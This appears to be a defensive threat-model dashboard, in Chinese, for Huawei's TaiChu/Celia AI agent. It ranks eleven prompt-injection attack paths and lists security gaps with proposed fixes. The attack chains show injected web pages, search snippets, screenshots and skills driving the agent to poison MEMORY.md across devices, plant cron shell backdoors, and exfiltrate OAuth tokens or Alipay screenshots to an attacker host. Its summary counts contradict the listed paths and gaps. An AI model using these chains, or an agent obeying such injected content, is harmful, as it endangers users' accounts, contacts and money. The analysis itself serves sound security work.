TaiChu Agent — Top 11 AttackPaths (RiskScore v1.5)

华为"小艺"Celia · ATA Ontology v6.0 · 端云三层架构威胁分析 · 2026-05-19
11 APs · RiskScore v1.5 7 SC-GAP 端云联动 · 多设备传播
17.5
最高 RiskScore
8
攻击路径
7
SC-GAP
5
持久化路径

端云三层架构威胁概述

A-System(端侧客户端)

HarmonyOS App · FlutterAGUI
FFI-v2 (.so) + Rust runtime
exec_cli / exec_os_api 无白名单
技能市场 Skill 注入 · NFC/二维码攻击

TAICHU Service(云侧 Agent)

Axum HTTP · sys_celia_main
bash/write/cron/run_subagent 全套危险工具
MEMORY.md 云同步传播
.taichu.json LLM provider 劫持

Device Agents(端侧设备)

手机/PC/车机独立 AgentProfile
接收云端 SubAgent 指令(无验证)
session-sync 5s 跨设备传播
华为账号 OAuth Token 直接访问

RiskScore v1.5 公式

注入分 = min(5, accessibility × trigger × 5) 危害分 = min(10, 危害等级 × 影响范围 × (∏ d_Sinkᵢ) × 10) Novelty = Breakthrough(0~3) + Rarity(-1~2) Total = 注入分 + 危害分 + Novelty ∈ [-2, 20] TaiChu 特有放大因子: • exec_cli/exec_os_api 无白名单 → 逃逸+3(最高) • session-sync 5s 跨设备传播 → 影响范围×0.95 • MEMORY.md 云同步 → 持久化×跨设备双重放大 • SubAgent 云→端下发 → 跨越信任边界(Novelty +2~3)
AP 排名总览
总分 注入分 危害分 Novelty
排名AP-ID攻击名称注入分危害分Novelty总分
1 AP-TaiChu-04 云侧注入→SubAgent 下发端侧→端侧 exec_cli 5.09.03.0 17.5
2 AP-TaiChu-03 exec_cli 注入→鸿蒙 API→通讯录/相册窃取 5.09.02.0 16.0
3 AP-TaiChu-01 web_fetch 注入→MEMORY.md→跨设备同步传播 4.88.13.0 15.9
4 AP-TaiChu-02 web_fetch 注入→cron→bash(WAKEUP 持久后门) 4.87.63.0 15.4
5 AP-TaiChu-08 exec_os_api→华为账号 OAuth Token 窃取 4.48.62.0 15.2
6 AP-TaiChu-05 恶意 Skill 植入→system prompt 永久污染 5.06.53.0 14.5
7 AP-TaiChu-06 session-sync 劫持→跨设备 MEMORY 污染 2.19.03.0 14.1
8 AP-TaiChu-07 .taichu.json gateway 劫持→LLM provider 替换 3.757.22.8 13.8
6 AP-TaiChu-11 app_controller VLM 截图视觉注入→MEMORY.md 持久化污染 3.09.23.0 15.2
7 AP-TaiChu-10 用户指令劫持→app_controller 短信→联系人钓鱼传播 3.48.52.5 14.5
11 AP-TaiChu-09 web_search SEO 投毒→支付宝截图外泄(财务数据) 2.458.02.5 13.0
AP 详情卡片
01

云侧注入 → SubAgent 下发端侧 → 端侧 exec_cli(云控端侧设备执行)

AP-TaiChu-04 · 跨边界特权升级 · cloud-collab-subagent · target_runner.rs · SCG-TC-04
17.5
RiskScore v1.5
注入 5.0 危害 9.0 N=3.0
目标TC-AGENT-01(云)→ TC-AGENT-03(手机) 注入点PE-TC-04-01 · PUBLIC · web_fetch → run_subagent(instruction 无验证) SC-GAPSCG-TC-04 SCG-TC-02 SCG-TC-06 传播CLOUD_TO_DEVICE · 无需物理接触用户手机
攻击链(Sink Chain)
恶意网页(PUBLIC) web_fetch(无响应过滤) run_subagent(instruction=攻击) control-plane relay TargetRemoteSubagentRunnerFactory exec_cli("/system/bin/sh") 华为账号 Token 外泄
受影响扩展资产
华为账号 OAuth Token ★★★★★ 通讯录 相册 应用凭证(微信/支付宝) 安装应用列表 IMEI/设备标识
02

exec_cli 注入 → 鸿蒙系统 API 滥用(通讯录/相册数据窃取)

AP-TaiChu-03 · 隐私数据窃取 · exec_cli.rs 无白名单(源码确认)· ArkTS Bridge
16.0
RiskScore v1.5
注入 5.0 危害 9.0 N=2.0
目标TC-AGENT-03(Device Agent Phone) 注入点PE-TC-03-01 · 直接消息注入(NFC/分享内容/社工) SC-GAPSCG-TC-02 exec_cli 无 cli_path 白名单(exec_cli.rs 确认) 传播SINGLE_DEVICE 手机端
攻击链(双路径)
社工消息/NFC exec_os_api("contactsList") exec_cli("/system/bin/sh" [tar+curl]) ArkTS Bridge → HarmonyOS ToolService 通讯录+相册+微信数据库外泄
受影响扩展资产
通讯录(全量)★★★★★ 短信内容 相册/证件照 微信/支付宝数据库 华为账号 Token 健康数据
03

web_fetch 注入 → MEMORY.md 认知污染 → 跨设备同步(恶意记忆多端传播)

AP-TaiChu-01 · 认知污染 · session-sync 5s 传播 · 所有设备持久感染
15.9
RiskScore v1.5
注入 4.8 危害 8.1 N=3.0
目标TC-AGENT-01 → 所有 Device Agents(手机/PC/车机) 注入点PE-TC-01-01 · PUBLIC · web_fetch 恶意网页响应 SC-GAPSCG-TC-06 响应无过滤 + SCG-TC-05 write 覆盖 MEMORY.md 持久化YES · MEMORY.md 云同步 · 传播延迟 ≤5s
攻击链(含跨设备传播)
恶意网页(PUBLIC) web_fetch(无响应过滤) write(MEMORY.md, 持久指令) session-sync push(≤5s) 所有设备 MEMORY.md 多端持久后门
受影响扩展资产
所有设备 MEMORY.md(永久感染)★★★★★ 地理位置(持续采集) 日历/行程 通讯录 session 历史
04

web_fetch 注入 → cron 持久化 → bash(App 唤醒后 Shell 后门)

AP-TaiChu-02 · 持久化后门 · HarmonyOS WAKEUP systemTimer · App 关闭仍触发
15.4
RiskScore v1.5
注入 4.8 危害 7.6 N=3.0
目标TC-AGENT-01(sys_celia_main) 注入点PE-TC-02-01 · web_fetch 恶意响应 SC-GAPSCG-TC-06 SCG-TC-03 cron instruction 无过滤 SCG-TC-01 bash 无过滤 持久化YES · HarmonyOS WAKEUP 系统定时器 · 可 daily 触发
攻击链
恶意网页 web_fetch cron(create, payload.instruction="bash...") HarmonyOS systemTimer WAKEUP|EXACT bash("恶意命令") 每日持续外泄
受影响扩展资产
应用凭证(微信/支付宝) 华为账号 OAuth Token 相册/文件 网络配置/ARP 表
05

端侧 exec_os_api → 华为账号 Token 窃取(OAuth Token 外泄)

AP-TaiChu-08 · OAuth Token 窃取 · exec_os_api 无 API 白名单 · 华为 SSO 接管
15.2
RiskScore v1.5
注入 4.4 危害 8.6 N=2.0
目标TC-AGENT-03(Device Agent Phone) 注入点PE-TC-08-01 · NFC/二维码/社工消息(PUBLIC) SC-GAPexec_os_api 无 API 白名单(exec_os_api.rs 源码确认) 危害范围华为 SSO 全系服务(邮件/云盘/支付/商店)
攻击链
NFC/二维码 exec_os_api("getHuaweiAccountToken") HarmonyOS Keystore web_fetch(attacker, POST, {token}) 华为账号 SSO 接管
受影响扩展资产
华为账号 OAuth Token ★★★★★ 华为云盘 华为邮件 华为支付/钱包 通讯录/日历(云备份) 健康数据
08

恶意 Skill 植入 → system prompt 永久污染(自定义 Skill 攻击)

AP-TaiChu-05 · 供应链注入 · prompt_builder.rs skill_dirs · 技能市场供应链
14.5
RiskScore v1.5
注入 5.0 危害 6.5 N=3.0
目标TC-AGENT-01 + 所有 Device Agents 注入点PE-TC-05-01(技能市场)/ PE-TC-05-02(write 工具植入) SC-GAPSCG-TC-05 write 可覆盖 skills/ SCG-TC-06 持久化YES · SKILL.md 存在期间每次对话感染
攻击链(双路径)
恶意 Skill / write 植入 SKILL.md 写入 skill_dirs/ LocalFsPromptBuilder(每次对话扫描) system prompt 注入(无签名验证) 持久化位置/通讯录采集
受影响扩展资产
地理位置(每次对话采集) 日历/行程 通讯录 session 历史 用户偏好(USER.md)
09

session-sync 劫持 → 跨设备 MEMORY 污染(同步传播攻击)

AP-TaiChu-06 · 跨设备传播 · session_worker.rs 5s pull · 无完整性验证
14.1
RiskScore v1.5
注入 2.1 危害 9.0 N=3.0
目标TC-AGENT-05(车机) → 手机/PC → 云侧(所有设备) 注入点PE-TC-06-01 · ITM · 弱端侧设备(车机)write MEMORY.md SC-GAPSCG-TC-05 + session-sync 无完整性验证 传播速度WORKER_PULL_ACTIVE_INTERVAL = 5s(源码确认)
攻击链(含 5s 传播)
车机端(弱端点)注入 write(MEMORY.md) session-sync push 云端 session store 所有设备 pull(≤5s) 全设备持久感染
受影响扩展资产
所有设备 MEMORY.md 企业 SSH Key(PC) 工作文档(PC) 地理位置(手机/车机) 企业 VPN 证书
10

.taichu.json gateway 劫持 → LLM Provider 替换(供应链控制)

AP-TaiChu-07 · 供应链控制 · bash 无内容过滤 · Heavy Runtime PERSONAL-API-KEY
13.8
RiskScore v1.5
注入 3.75 危害 7.2 N=2.8
目标TC-AGENT-01(云侧)+ TC-AGENT-06(Heavy Runtime) 注入点PE-TC-07-01 · bash 读写 .taichu.json / secret.yaml SC-GAPSCG-TC-01 bash 无内容过滤 持久化YES · .taichu.json 修改持久有效
攻击链(双路径)
注入 bash("cat ~/.taichu.json") bash(修改 gateway_url=attacker.com) Agent 重启后加载 所有对话被中间人截获
受影响扩展资产
所有对话内容 .taichu.json API Keys PERSONAL-API-KEY(Heavy Runtime) 用户意图/行为模式
06

app_controller VLM 截图视觉注入 → MEMORY.md 持久化污染

AP-TaiChu-11 · PS-TOOL_RESULT[app_controller] · SI-01 持久化认知控制 · SCG-TC-10/11
15.2
RiskScore v1.5
注入 3.0 危害 9.2 N=3.0
目标TC-AGENT-03(Device Agent Phone) 注入点PE-TC-11-01 · app_controller Phase2 VLM 截图(视觉上下文) SC-GAPSCG-TC-10 VLM截图无视觉注入防御 · SCG-TC-11 MEMORY.md写入无内容验证 持久化YES · MEMORY.md 每次会话加载
攻击链
屏幕含注入文字 app_controller Phase2 VLM 截图 VLM 解析注入文字为指令 write(MEMORY.md, 恶意内容) 持久化认知控制 + 多端传播
受影响扩展资产
MEMORY.md 认知控制权 所有后续对话内容 设备控制权(链式攻击) Agent 行为可信度
07

用户指令劫持 → app_controller 短信 → 联系人钓鱼传播

AP-TaiChu-10 · PS-USER_MSG · SI-04 跨设备横向传播 · SCG-TC-08/09
14.5
RiskScore v1.5
注入 3.4 危害 8.5 N=2.5
目标TC-AGENT-03(Device Agent Phone) 注入点PE-TC-10-01 · 用户直接输入(社工诱导粘贴钓鱼模板) SC-GAPSCG-TC-08 app_controller无敏感任务兜底 · SCG-TC-09 短信URL无审查 传播范围通讯录所有联系人(真实手机号发送)
攻击链
社工→用户粘贴钓鱼模板 app_controller(打开系统短信) VLM: select_all_contacts → type(含钓鱼URL) click(发送) → 运营商SMS 联系人收到"朋友"发送的钓鱼短信
受影响扩展资产
通讯录联系人 用户社交信誉 联系人设备安全 用户手机号(发送方)
11

web_search SEO 投毒 → app_controller 支付宝截图 → 财务数据外泄

AP-TaiChu-09 · PS-TOOL_RESULT[web_search] · SI-02 敏感数据外泄 · SCG-TC-07/08
13.0
RiskScore v1.5
注入 2.45 危害 8.0 N=2.5
目标TC-AGENT-03(Device Agent Phone) 注入点PE-TC-09-01 · Tavily web_search snippet(SEO 投毒) SC-GAPSCG-TC-07 web_search snippet无过滤 · SCG-TC-08 app_controller无敏感兜底 外泄方式web_fetch POST base64 截图到攻击者服务器
攻击链(≤3步,短任务)
web_search(支付宝相关词条) Tavily snippet含注入指令 app_controller(打开支付宝+截图) web_fetch POST(base64截图) 财务数据外泄
受影响扩展资产
支付宝账户余额 近期交易记录(5条) 用户手机号尾号 绑定银行卡信息

SC-GAP 汇总(11 个安全检查缺口)

SCG-TC-01 P0 极高危
bash 工具无内容过滤,任意 shell 命令可执行(120s 超时无限制)
修复:命令黑名单 + 沙箱容器隔离
SCG-TC-02 P0 极高危
exec_cli 无 cli_path 白名单,LLM 完全控制执行路径(exec_cli.rs 源码确认)
修复:cli_path 强制白名单 + args 字符过滤
SCG-TC-03 P1 高危
cron payload.instruction 无内容限制,可注入任意 shell 命令到定时任务
修复:instruction schema 验证 + 关键字黑名单
SCG-TC-04 P1 高危
run_subagent instruction 无限制,可向任意设备下发恶意指令(跨越云→端信任边界)
修复:AI-Based 指令审查 + 跨设备工具集限制
SCG-TC-05 P0 极高危
write 工具可覆盖 MEMORY.md/IDENTITY.md/SOUL.md,直接篡改 Agent 认知
修复:关键文件写保护 + 专用记忆 API
SCG-TC-06 P1 高危
URL guard 仅防 SSRF,不过滤响应内容,恶意 HTML 注入无阻拦(DNS 重绑定弱点)
修复:IP 重验证 + 响应内容 AI 注入检测
SCG-TC-07 P1 高危
web_search snippet 直接进入 LLM 上下文,Tavily 结果中的注入指令无过滤
修复:Tavily 响应内容 AI 注入检测(与 SCG-TC-06 同修复优先级)
SCG-TC-08 P0 极高危
app_controller app_chooser 无敏感任务识别兜底,截图支付宝/群发短信不触发 Clarify
修复:app_chooser 增加操作危害评估层,截图敏感App/发送短信触发 Clarify 或拒绝
SCG-TC-09 P1 高危
app_controller 在系统短信 type() 操作中不检查 URL 安全性,钓鱼链接可直接发出
修复:短信内容 URL 过滤(已知钓鱼域名黑名单 + 可信 URL 白名单)
SCG-TC-10 P0 极高危
app_controller Phase2 VLM 截图无视觉注入防御,屏幕文字可被 VLM 解析为可执行指令
修复:Phase2 VLM 输出经文本安全扫描;禁止 VLM 在截图处理中触发写文件操作
SCG-TC-11 P0 极高危
write 工具写 MEMORY.md 无内容安全验证,VLM 和任意工具均可覆盖关键记忆文件
修复:并入 SCG-TC-05,MEMORY.md 只允许 append API,禁止任意工具 overwrite
SCG-TC-12 P0 极高危
plugin.json 可被 write 覆盖,.dylib 加载路径被篡改等于 RCE
修复:plugin.json 写保护 + .dylib 代码签名验证
TaiChu Agent · ATA Ontology v6.0 · RiskScore v1.5 · 2026-05-19 · v2.1 (11 APs)
8 AttackPaths · 7 SC-GAP · MAX RiskScore 17.5 · 端云三层架构威胁分析
完整分析报告 →  |  HermesAgent 对比 →